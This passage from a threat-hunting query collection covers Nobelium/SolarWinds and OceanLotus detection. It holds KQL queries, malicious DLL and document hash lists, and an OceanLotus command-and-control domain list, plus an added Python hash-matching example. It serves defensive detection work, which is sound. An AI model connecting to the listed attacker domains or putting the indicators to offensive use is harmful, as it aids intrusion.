Nobelium silently added malicious code to legitimate software updates for Orion, which is IT monitoring software provided by SolarWinds. In this way, malicious dynamic link libraries (DLLs) were distributed to SolarWinds customers.

The following query detects events when SolarWinds processes attempted to launch the [cmd.exe](https://docs.microsoft.com/windows-server/administration/windows-commands/cmd) command prompt using the `echo` command.
Using `echo` in this way is suspicious, as it is an indirect way of issuing commands, and may not be readily detected by certain kinds of security solutions.

More Nobelium-related queries can be found listed under the [See also](#see-also) section of this document.

## Query

```kusto
DeviceProcessEvents
| where InitiatingProcessFileName =~ "SolarWinds.BusinessLayerHost.exe"
| where FileName == "cmd.exe" and ProcessCommandLine has "echo"
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | v | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## See also

* [Locate Nobelium implant receiving DNS response](./c2-lookup-from-nonbrowser[Nobelium].md)
* [Locate Nobelium implant receiving DNS response](./c2-lookup-response[Nobelium].md)
* [Compromised certificate [Nobelium]](./compromised-certificate[Nobelium].md)
* [FireEye Red Team tool CVEs [Nobelium]](./fireeye-red-team-tools-CVEs%20[Nobelium].md)
* [FireEye Red Team tool HASHs [Nobelium]](./fireeye-red-team-tools-HASHs%20[Nobelium].md)
* [View data on software identified as affected by Nobelium campaign](./known-affected-software-orion[Nobelium].md)
* [Locate SolarWinds processes launching suspicious PowerShell commands](./launching-base64-powershell[Nobelium].md)
* [Locate Nobelium-related malicious DLLs created in the system or locally](./locate-dll-created-locally[Nobelium].md)
* [Locate Nobelium-related malicious DLLs loaded in memory](./locate-dll-loaded-in-memory[Nobelium].md)
* [Get an inventory of SolarWinds Orion software possibly affected by Nobelium](./possible-affected-software-orion[Nobelium].md)
* [Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]](../Collection/Anomaly%20of%20MailItemAccess%20by%20Other%20Users%20Mailbox%20[Nobelium].md)
* [Nobelium campaign DNS pattern](../Command%20and%20Control/DNSPattern%20[Nobelium].md)
* [Nobelium encoded domain in URL](../Command%20and%20Control/EncodedDomainURL%20[Nobelium].md)
* [Domain federation trust settings modified](../Defense%20evasion/ADFSDomainTrustMods[Nobelium].md)
* [Discovering potentially tampered devices [Nobelium]](../Defense%20evasion/Discovering%20potentially%20tampered%20devices%20[Nobelium].md)
* [Mail.Read or Mail.ReadWrite permissions added to OAuth application](../Defense%20evasion/MailPermissionsAddedToApplication[Nobelium].md)
* [Suspicious enumeration using Adfind tool](../Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md)
* [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md)
* [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md)
* [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI anomaly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md)
* [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md)
* [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md)
* [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md)
* [ServicePrincipalAddedToRole [Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md)

## Contributor info

**Contributor:** Microsoft Threat Protection team

================================================
FILE: Campaigns/locate-dll-created-locally[Nobelium].md
================================================

# Locate Nobelium-related malicious DLLs created in the system or locally

This query was originally published in the threat analytics report, *Solorigate supply chain attack*. Please note that these attacks are currently known as the *Nobelium campaign*.

Microsoft detects the [2020 SolarWinds supply chain attack](https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/) implant and its other components as part of a campaign by the Nobelium activity group. Nobelium is the threat actor behind the attack against SolarWinds, which was previously referred to as [*Solorigate*](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/).

Nobelium silently added malicious code to legitimate software updates for Orion, which is IT monitoring software provided by SolarWinds. In this way, malicious dynamic link libraries (DLLs) were distributed to SolarWinds customers.

The following query locates malicious Nobelium-associated DLLs that have been created in the system or locally.

More Nobelium-related queries can be found listed under the [See also](#see-also) section of this document.
## Query

```kusto
DeviceFileEvents
| where SHA1 in ("76640508b1e7759e548771a5359eaed353bf1eec", "d130bd75645c2433f88ac03e73395fba172ef676",
    "1acf3108bf1e376c8848fbb25dc87424f2c2a39c", "e257236206e99f5a5c62035c9c59c57206728b28",
    "6fdd82b7ca1c1f0ec67c05b36d14c9517065353b", "2f1a5a7411d015d01aaee4535835400191645023",
    "bcb5a4dcbc60d26a5f619518f2cfc1b4bb4e4387", "16505d0b929d80ad1680f993c02954cfd3772207",
    "d8938528d68aabe1e31df485eb3f75c8a925b5d9", "395da6d4f3c890295f7584132ea73d759bd9d094",
    "c8b7f28230ea8fbf441c64fdd3feeba88607069e", "2841391dfbffa02341333dd34f5298071730366a",
    "2546b0e82aecfe987c318c7ad1d00f9fa11cd305", "2dafddbfb0981c5aa31f27a298b9c804e553c7bc",
    "e2152737bed988c0939c900037890d1244d9a30e", "fd15760abfc0b2537b89adc65b1ff3f072e7e31c")
    or SHA256 in ("32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77",
    "ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6",
    "dab758bf98d9b36fa057a66cd0284737abf89857b73ca89280267ee7caf62f3b",
    "eb6fab5a2964c5817fb239a7a5079cabca0a00464fb3e07155f28b0a57a2c0ed",
    "ac1b2b89e60707a20e9eb1ca480bc3410ead40643b386d624c5d21b47c02917c",
    "019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134",
    "c09040d35630d75dfef0f804f320f8b3d16a481071076918e9b236a321c1ea77",
    "0f5d7e6dfdd62c83eb096ba193b5ae394001bac036745495674156ead6557589",
    "e0b9eda35f01c1540134aba9195e7e6393286dde3e001fce36fb661cc346b91d",
    "20e35055113dac104d2bb02d4e7e33413fae0e5a426e0eea0dfd2c1dce692fd9",
    "2b3445e42d64c85a5475bdbc88a50ba8c013febb53ea97119a11604b7595e53d",
    "a3efbc07068606ba1c19a7ef21f4de15d15b41ef680832d7bcba485143668f2d",
    "92bd1c3d2a11fc4aba2735d9547bd0261560fb20f36a0e7ca2f2d451f1b62690",
    "a58d02465e26bdd3a839fd90e4b317eece431d28cab203bbdde569e11247d9e2",
    "b8a05cc492f70ffa4adcd446b693d5aa2b71dc4fa2bf5022bf60d7b13884f666",
    "cc082d21b9e880ceb6c96db1c48a0375aaf06a5f444cb0144b70e01dc69048e6",
    "ffdbdd460420972fd2926a7f460c198523480bc6279dd6cca177230db18748e8")
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | v | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | v | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | v | |

## See also

* [Locate Nobelium implant receiving DNS response](./c2-lookup-from-nonbrowser[Nobelium].md)
* [Locate Nobelium implant receiving DNS response](./c2-lookup-response[Nobelium].md)
* [Compromised certificate [Nobelium]](./compromised-certificate[Nobelium].md)
* [FireEye Red Team tool CVEs [Nobelium]](./fireeye-red-team-tools-CVEs%20[Nobelium].md)
* [FireEye Red Team tool HASHs [Nobelium]](./fireeye-red-team-tools-HASHs%20[Nobelium].md)
* [View data on software identified as affected by Nobelium campaign](./known-affected-software-orion[Nobelium].md)
* [Locate SolarWinds processes launching suspicious PowerShell commands](./launching-base64-powershell[Nobelium].md)
* [Locate SolarWinds processes launching command prompt with the echo command](./launching-cmd-echo[Nobelium].md)
* [Locate Nobelium-related malicious DLLs loaded in memory](./locate-dll-loaded-in-memory[Nobelium].md)
* [Get an inventory of SolarWinds Orion software possibly affected by Nobelium](./possible-affected-software-orion[Nobelium].md)
* [Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]](../Collection/Anomaly%20of%20MailItemAccess%20by%20Other%20Users%20Mailbox%20[Nobelium].md)
* [Nobelium campaign DNS pattern](../Command%20and%20Control/DNSPattern%20[Nobelium].md)
* [Nobelium encoded domain in URL](../Command%20and%20Control/EncodedDomainURL%20[Nobelium].md)
* [Domain federation trust settings modified](../Defense%20evasion/ADFSDomainTrustMods[Nobelium].md)
* [Discovering potentially tampered devices [Nobelium]](../Defense%20evasion/Discovering%20potentially%20tampered%20devices%20[Nobelium].md)
* [Mail.Read or Mail.ReadWrite permissions added to OAuth application](../Defense%20evasion/MailPermissionsAddedToApplication[Nobelium].md)
* [Suspicious enumeration using Adfind tool](../Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md)
* [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md)
* [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md)
* [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI anomaly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md)
* [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md)
* [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md)
* [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md)
* [ServicePrincipalAddedToRole [Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md)

## Contributor info

**Contributor:** Microsoft Threat Protection team

================================================
FILE: Campaigns/locate-dll-loaded-in-memory[Nobelium].md
================================================

# Locate Nobelium-related malicious DLLs loaded in memory

This query was originally published in the threat analytics report, *Solorigate supply chain attack*. Please note that these attacks are currently known as the *Nobelium campaign*.

Microsoft detects the [2020 SolarWinds supply chain attack](https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/) implant and its other components as part of a campaign by the Nobelium activity group. Nobelium is the threat actor behind the attack against SolarWinds, which was previously referred to as [*Solorigate*](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/).

Nobelium silently added malicious code to legitimate software updates for Orion, which is IT monitoring software provided by SolarWinds. In this way, malicious dynamic link libraries (DLLs) were distributed to SolarWinds customers.

The following query locates malicious Nobelium-associated DLLs that have been loaded into memory on affected systems.

More Nobelium-related queries can be found listed under the [See also](#see-also) section of this document.
## Query

```kusto
DeviceImageLoadEvents
| where SHA1 in ("76640508b1e7759e548771a5359eaed353bf1eec", "d130bd75645c2433f88ac03e73395fba172ef676",
    "1acf3108bf1e376c8848fbb25dc87424f2c2a39c", "e257236206e99f5a5c62035c9c59c57206728b28",
    "6fdd82b7ca1c1f0ec67c05b36d14c9517065353b", "2f1a5a7411d015d01aaee4535835400191645023",
    "bcb5a4dcbc60d26a5f619518f2cfc1b4bb4e4387", "16505d0b929d80ad1680f993c02954cfd3772207",
    "d8938528d68aabe1e31df485eb3f75c8a925b5d9", "395da6d4f3c890295f7584132ea73d759bd9d094",
    "c8b7f28230ea8fbf441c64fdd3feeba88607069e", "2841391dfbffa02341333dd34f5298071730366a",
    "2546b0e82aecfe987c318c7ad1d00f9fa11cd305", "2dafddbfb0981c5aa31f27a298b9c804e553c7bc",
    "e2152737bed988c0939c900037890d1244d9a30e", "fd15760abfc0b2537b89adc65b1ff3f072e7e31c")
    or SHA256 in ("32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77",
    "ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6",
    "dab758bf98d9b36fa057a66cd0284737abf89857b73ca89280267ee7caf62f3b",
    "eb6fab5a2964c5817fb239a7a5079cabca0a00464fb3e07155f28b0a57a2c0ed",
    "ac1b2b89e60707a20e9eb1ca480bc3410ead40643b386d624c5d21b47c02917c",
    "019085a76ba7126fff22770d71bd901c325fc68ac55aa743327984e89f4b0134",
    "c09040d35630d75dfef0f804f320f8b3d16a481071076918e9b236a321c1ea77",
    "0f5d7e6dfdd62c83eb096ba193b5ae394001bac036745495674156ead6557589",
    "e0b9eda35f01c1540134aba9195e7e6393286dde3e001fce36fb661cc346b91d",
    "20e35055113dac104d2bb02d4e7e33413fae0e5a426e0eea0dfd2c1dce692fd9",
    "2b3445e42d64c85a5475bdbc88a50ba8c013febb53ea97119a11604b7595e53d",
    "a3efbc07068606ba1c19a7ef21f4de15d15b41ef680832d7bcba485143668f2d",
    "92bd1c3d2a11fc4aba2735d9547bd0261560fb20f36a0e7ca2f2d451f1b62690",
    "a58d02465e26bdd3a839fd90e4b317eece431d28cab203bbdde569e11247d9e2",
    "b8a05cc492f70ffa4adcd446b693d5aa2b71dc4fa2bf5022bf60d7b13884f666",
    "cc082d21b9e880ceb6c96db1c48a0375aaf06a5f444cb0144b70e01dc69048e6",
    "ffdbdd460420972fd2926a7f460c198523480bc6279dd6cca177230db18748e8")
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | v | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | v | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | v | |

## See also

* [Locate Nobelium implant receiving DNS response](./c2-lookup-from-nonbrowser[Nobelium].md)
* [Locate Nobelium implant receiving DNS response](./c2-lookup-response[Nobelium].md)
* [Compromised certificate [Nobelium]](./compromised-certificate[Nobelium].md)
* [FireEye Red Team tool CVEs [Nobelium]](./fireeye-red-team-tools-CVEs%20[Nobelium].md)
* [FireEye Red Team tool HASHs [Nobelium]](./fireeye-red-team-tools-HASHs%20[Nobelium].md)
* [View data on software identified as affected by Nobelium campaign](./known-affected-software-orion[Nobelium].md)
* [Locate SolarWinds processes launching suspicious PowerShell commands](./launching-base64-powershell[Nobelium].md)
* [Locate SolarWinds processes launching command prompt with the echo command](./launching-cmd-echo[Nobelium].md)
* [Locate Nobelium-related malicious DLLs created in the system or locally](./locate-dll-created-locally[Nobelium].md)
* [Get an inventory of SolarWinds Orion software possibly affected by Nobelium](./possible-affected-software-orion[Nobelium].md)
* [Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]](../Collection/Anomaly%20of%20MailItemAccess%20by%20Other%20Users%20Mailbox%20[Nobelium].md)
* [Nobelium campaign DNS pattern](../Command%20and%20Control/DNSPattern%20[Nobelium].md)
* [Nobelium encoded domain in URL](../Command%20and%20Control/EncodedDomainURL%20[Nobelium].md)
* [Domain federation trust settings modified](../Defense%20evasion/ADFSDomainTrustMods[Nobelium].md)
* [Discovering potentially tampered devices [Nobelium]](../Defense%20evasion/Discovering%20potentially%20tampered%20devices%20[Nobelium].md)
* [Mail.Read or Mail.ReadWrite permissions added to OAuth application](../Defense%20evasion/MailPermissionsAddedToApplication[Nobelium].md)
* [Suspicious enumeration using Adfind tool](../Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md)
* [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md)
* [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md)
* [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI anomaly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md)
* [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md)
* [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md)
* [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md)
* [ServicePrincipalAddedToRole [Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md)

## Contributor info

**Contributor:** Microsoft 365 Defender team

================================================
FILE: Campaigns/oceanlotus-apt32-files.md
================================================

# Detect malicious documents associated with group known as "OceanLotus"

This query was originally published in a threat analytics report about the group known to other security researchers as *APT32* or *OceanLotus*.

This tracked activity group uses a wide array of malicious documents to conduct attacks. Some of their favorite techniques include sideloading dynamic link libraries, and disguising payloads as image files.

The group has weaponized files with exploits for the following vulnerabilities:

* [CVE-2017-11882](https://nvd.nist.gov/vuln/detail/CVE-2017-11882) - [Software update](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882)
* [CVE-2017-0199](https://nvd.nist.gov/vuln/detail/CVE-2017-0199) - [Software update](https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199)

The following query detects known malicious files associated with the group's campaigns.

See [Detect malicious network activity associated with group known as "OceanLotus"](oceanlotus-apt32-network.md) for another query related to this group's activity.
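The OceanLotus query that follows, like the two Nobelium DLL queries above, is an indicator match on a hash column, and such a match only works when each digest is compared against the column of the same digest type. As an added example (not code from this repository), the following Python sorts a mixed indicator list by digest length, sets aside anything that is not a well-formed digest (a label that lost its comment marker, a truncated value), and matches constructed `DeviceFileEvents`-style records on the corresponding field. All hash values and events in it are constructed and are not real indicators.

```python
"""Hash-indicator matching with digest-type validation.

Added example, not part of the WindowsDefenderATP-Hunting-Queries
repository. Indicator values and events are constructed for
illustration and are not real IoCs.
"""
import re
from collections import defaultdict

# Digest length in hex characters -> field name in the event records
# (mirrors the MD5 / SHA1 / SHA256 columns of the Defender device tables).
DIGEST_FIELDS = {32: "MD5", 40: "SHA1", 64: "SHA256"}
HEX_RE = re.compile(r"^[0-9a-f]+$")


def classify_indicators(indicators):
    """Split a mixed indicator list into per-digest-type sets.

    Returns (by_field, rejected): by_field maps "MD5"/"SHA1"/"SHA256" to a
    set of lowercase digests; rejected lists values that are not a hex
    digest of a known length.
    """
    by_field = defaultdict(set)
    rejected = []
    for raw in indicators:
        value = raw.strip().lower()
        field = DIGEST_FIELDS.get(len(value))
        if field is None or not HEX_RE.match(value):
            rejected.append(raw)
            continue
        by_field[field].add(value)
    return dict(by_field), rejected


def match_events(events, by_field):
    """Return events whose digest field matches an indicator of the same type.

    Each event is compared only on the field whose digest type matches the
    indicator, so a 64-hex value is never tested against the SHA1 column,
    where it could not match anything.
    """
    hits = []
    for event in events:
        for field, digests in by_field.items():
            value = (event.get(field) or "").lower()
            if value in digests:
                hits.append({**event, "MatchedOn": field})
                break
    return hits


# Constructed indicator list: one SHA1, one SHA256, one stray label that
# should have been a comment, and one truncated digest.
SAMPLE_INDICATORS = [
    "a" * 40,               # SHA1-length digest (constructed)
    "b" * 64,               # SHA256-length digest (constructed)
    "Malicious SFX Files",  # label, not a digest
    "c" * 38,               # 38 hex characters: truncated, no known type
]

# Constructed file events in the shape of DeviceFileEvents rows.
SAMPLE_EVENTS = [
    {"DeviceName": "ws01", "FileName": "a.dll", "SHA1": "A" * 40, "SHA256": "1" * 64},
    {"DeviceName": "ws02", "FileName": "b.sys", "SHA1": "2" * 40, "SHA256": "b" * 64},
    {"DeviceName": "ws03", "FileName": "c.exe", "SHA1": "3" * 40, "SHA256": "3" * 64},
]


def run_sample():
    """Classify the sample indicators and match them against the sample events."""
    by_field, rejected = classify_indicators(SAMPLE_INDICATORS)
    hits = match_events(SAMPLE_EVENTS, by_field)
    return by_field, rejected, hits


if __name__ == "__main__":
    by_field, rejected, hits = run_sample()
    print("rejected indicators:", rejected)
    for hit in hits:
        print(hit["DeviceName"], hit["FileName"], "matched on", hit["MatchedOn"])
```

The rejected list is the part worth looking at before an indicator set goes into a query: anything in it would silently match nothing in KQL, and a label sitting in a `pack_array` without its `//` is exactly the kind of entry it surfaces.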
## Query

```Kusto
let MaliciousFiles=pack_array(
//'KerrDown Lure Documents',
'b32b5f76e7386a65bd9220befb21e0c46d4084c4',
'c9d6b6fa37ca3d8cb57248993bb7c8a8fcd1bc89',
'bf127e2a526240c7e65f24c544dad820cebe6d88',
'347f555857d56a5afd33cfa19f8b5c771eed2553',
'26c86c777fc074f5bbad27084bcb3bbc7afff88e',
'872d2f4ccc43c08f73e84647b3098ff044cdfb75',
'fb20427d0ac3cd4542755168886a96bde04c4f81',
//'KerrDown Malware Downloader',
'5f42b1771ce97679df78713292838c830e606e48',
'72571ea4389af7a3a0e04d87327427d199f1d178',
'3f2a7b5605262d8aa189c32a049756c6bfed589b',
'220ea47d692afc196b5b913a9693323fd51f00f5',
'85021e711d5c7d5bd968f6dfed7102ab4d8828e8',
'c9e101c77f67203dfef66d21f2fa6c8765a6c649',
'3182141a8255baa5b82c0953dd4541c6f9f26a03',
'2d92d6459ef83ddf006bff4046b1bab86161a26b',
'6aef7916f1c5d1886db06fe2d4bf35614a0b921f',
'edd306617f1c7390a6bc067d3e8dfb44ac57287c',
'd8cd8068cb30605646258c7a0d9b47e00eac28c5',
'36422fe35473cc28a14701e5d9dcff4c2426d0ae',
//'OceanLotus Documents Exploiting CVE-2017-11882',
'd1357b284c951470066aaa7a8228190b88a5c7c3',
'49dff13500116b6c085c5ce3de3c233c28669678',
'9df3f0d8525edf2b88c4a150134c7699a85a1508',
'50a755b30e8f3646f9476080f2c3ae1347f8f556',
'bb060e5e7f7e946613a3497d58fbf026ae7c369a',
'e2d949cf06842b5f7ae6b2dffaa49771a93a00d9',
//'OceanLotus Malicious SFX Files',
'ac10f5b1d5ecab22b7b418d6e98fa18e32bbdeab',
'cd13210a142da4bc02da47455eb2cfe13f35804a',
'b4e6ddcd78884f64825fdf4710b35cdbeaabe8e2',
'cc918f0da51794f0174437d336e6f3edfdd3cbe4',
'8b991d4f2c108fd572c9c2059685fc574591e0be',
'3dfc3d81572e16ceaae3d07922255eb88068b91d',
//'OceanLotus OCX Dropper Files',
'efac23b0e6395b1178bcf7086f72344b24c04dcc',
'7642f2181cb189965c596964d2edf8fe50da742b',
'377fdc842d4a721a103c32ce8cb4daf50b49f303',
'bd39591a02b4e403a25aae502648264308085ded',
'b998f1b92ed6246ded13b79d069aa91c35637dec',
'83d520e8c3fdaefb5c8b180187b45c65590db21a',
'b744878e150a2c254c867bad610778852c66d50a',
'77c42f66dadf5b579f6bcd0771030adc7aefa97c',
//'Malicious PNG Loader Files Used By OceanLotus',
'b58b7e8361e15fdc9fb21d0f7c26d5fc17241ff7',
'5d5c1297415cc5746559182d91c9114700be07e2',
'43191e81e1dcc9fac138fc1cc5e3aeb9b25cc1f4',
//'Malicious DLL Files Used By OceanLotus',
'fa6be68b59b204c9f5ae886a888627a190491cf7',
'20c3a72ff476aa1fb71367e1d5dd6e0eb166167e',
'9d39e11f48b3ed4df35f5e19dd00b47764c98bdd',
'81c1aff8589dc1e556f68562d7154377c745a1d5',
'eb27eb72c4709d77db260b942d87ed486e271c93',
'a28095221fbaad64af7a098e3dda80f6f426b1c2',
'dabefa810a4febf4e7178df9d2ca2576333e04f2',
'e716a98a4f0ebd366ff29bd9164e81e7c39a7789',
'89abb3d70f200d480f05162c6877fab64941c5dd',
//'OceanLotus Documents Exploiting CVE-2017-0199',
'928b391af8e029dd8bef4f6dd82223b961429f0d',
'295a99bebb8122a0fc26086ecc115582f37f6b47',
'8b9fc2281a604a0ef2d56591a79f9f9397a6a2d2',
'ec34a6b8943c110687ef6f39a838e68d42d24863',
'd8be4f41886666687caf69533e11193e65e2a8e5',
//'Malicious Documents Used By OceanLotus',
'8b599ecdbec12a5bd76cf290f9297f13e8397d56',
'c9073998d2a202e944f21e973448062af4fd29c0',
'91510b97f764296b16fc88f0195cec6e6f1604af',
'e00a4e0a03655dccff5ffdb4f4540115d820b5bb',
'd39a7ecf844545363b96b8ee2eda9b76d51d602b',
//'JEShell Malware Downloader',
'8cad6621901b5512f4ecab7a22f8fcc205d3762b',
'668572ba2aff5374a3536075b01854678c392c04');
// All indicators above are SHA1 digests, so only the SHA1 column is compared.
union DeviceFileEvents, DeviceProcessEvents
| where Timestamp > ago(14d)
| where SHA1 in (MaliciousFiles)
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|-|-|-|
| Initial access | | |
| Execution | v | |
| Persistence | v | |
| Privilege escalation | | |
| Defense evasion | v | |
| Credential Access | | |
| Discovery | v | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | v | |

## Contributor info

**Contributor:** Microsoft Threat Protection team

================================================
FILE: Campaigns/oceanlotus-apt32-network.md
================================================

# Detect malicious network activity associated with group known as "OceanLotus"

This query was originally published in a threat analytics report about the group known to other security researchers as *APT32* or *OceanLotus*.

This tracked activity group uses a wide array of malicious documents to conduct attacks. Some of their favored techniques include sideloading dynamic link libraries, and disguising payloads as image files.

The following query detects network activity that may indicate an attack by this group.

See [Detect malicious documents associated with group known as "OceanLotus"](oceanlotus-apt32-files.md) for another query related to this group's activity.

## Query

```Kusto
//Network activities
DeviceNetworkEvents
| where Timestamp > ago(30d)
| where RemoteUrl in (
    //'Malicious URL Indicators for OceanLotus Activities 2019',
    'open.betaoffice.net',
    'outlook.updateoffices.net',
    'load.newappssystems.com',
    'syn.servebbs.com',
    //'C2 Indicators for OceanLotus Activities 2019',
    'cortanazone.com',
    'cortanasyn.com',
    'ristineho.com',
    'syn.servebbs.com')
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|-|-|-|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | v | |
| Lateral movement | v | |
| Collection | | |
| Command and control | v | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |

## Contributor info

**Contributor:** Microsoft Threat Protection team

================================================
FILE: Campaigns/possible-affected-software-orion[Nobelium].md
================================================

# Get an inventory of SolarWinds Orion software possibly affected by Nobelium

This query was originally published in the threat analytics report, *Solorigate supply chain attack*. Please note that these attacks are currently known as the *Nobelium campaign*.

Microsoft detects the [2020 SolarWinds supply chain attack](https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/) implant and its other components as part of a campaign by the Nobelium activity group. Nobelium is the threat actor behind the attack against SolarWinds, which was previously referred to as [*Solorigate*](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/).

Nobelium silently added malicious code to legitimate software updates for Orion, which is IT monitoring software provided by SolarWinds. In this way, malicious dynamic link libraries (DLLs) were distributed to SolarWinds customers.

The following query retrieves an inventory of SolarWinds Orion software in use in your organization, organized by product name and ordered by how many devices the software is installed on.

More Nobelium-related queries can be found listed under the [See also](#see-also) section of this document.
## Query

```kusto
DeviceTvmSoftwareVulnerabilities
| where SoftwareVendor == 'solarwinds'
| where SoftwareName startswith 'orion'
| summarize dcount(DeviceName) by SoftwareName
| sort by dcount_DeviceName desc
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
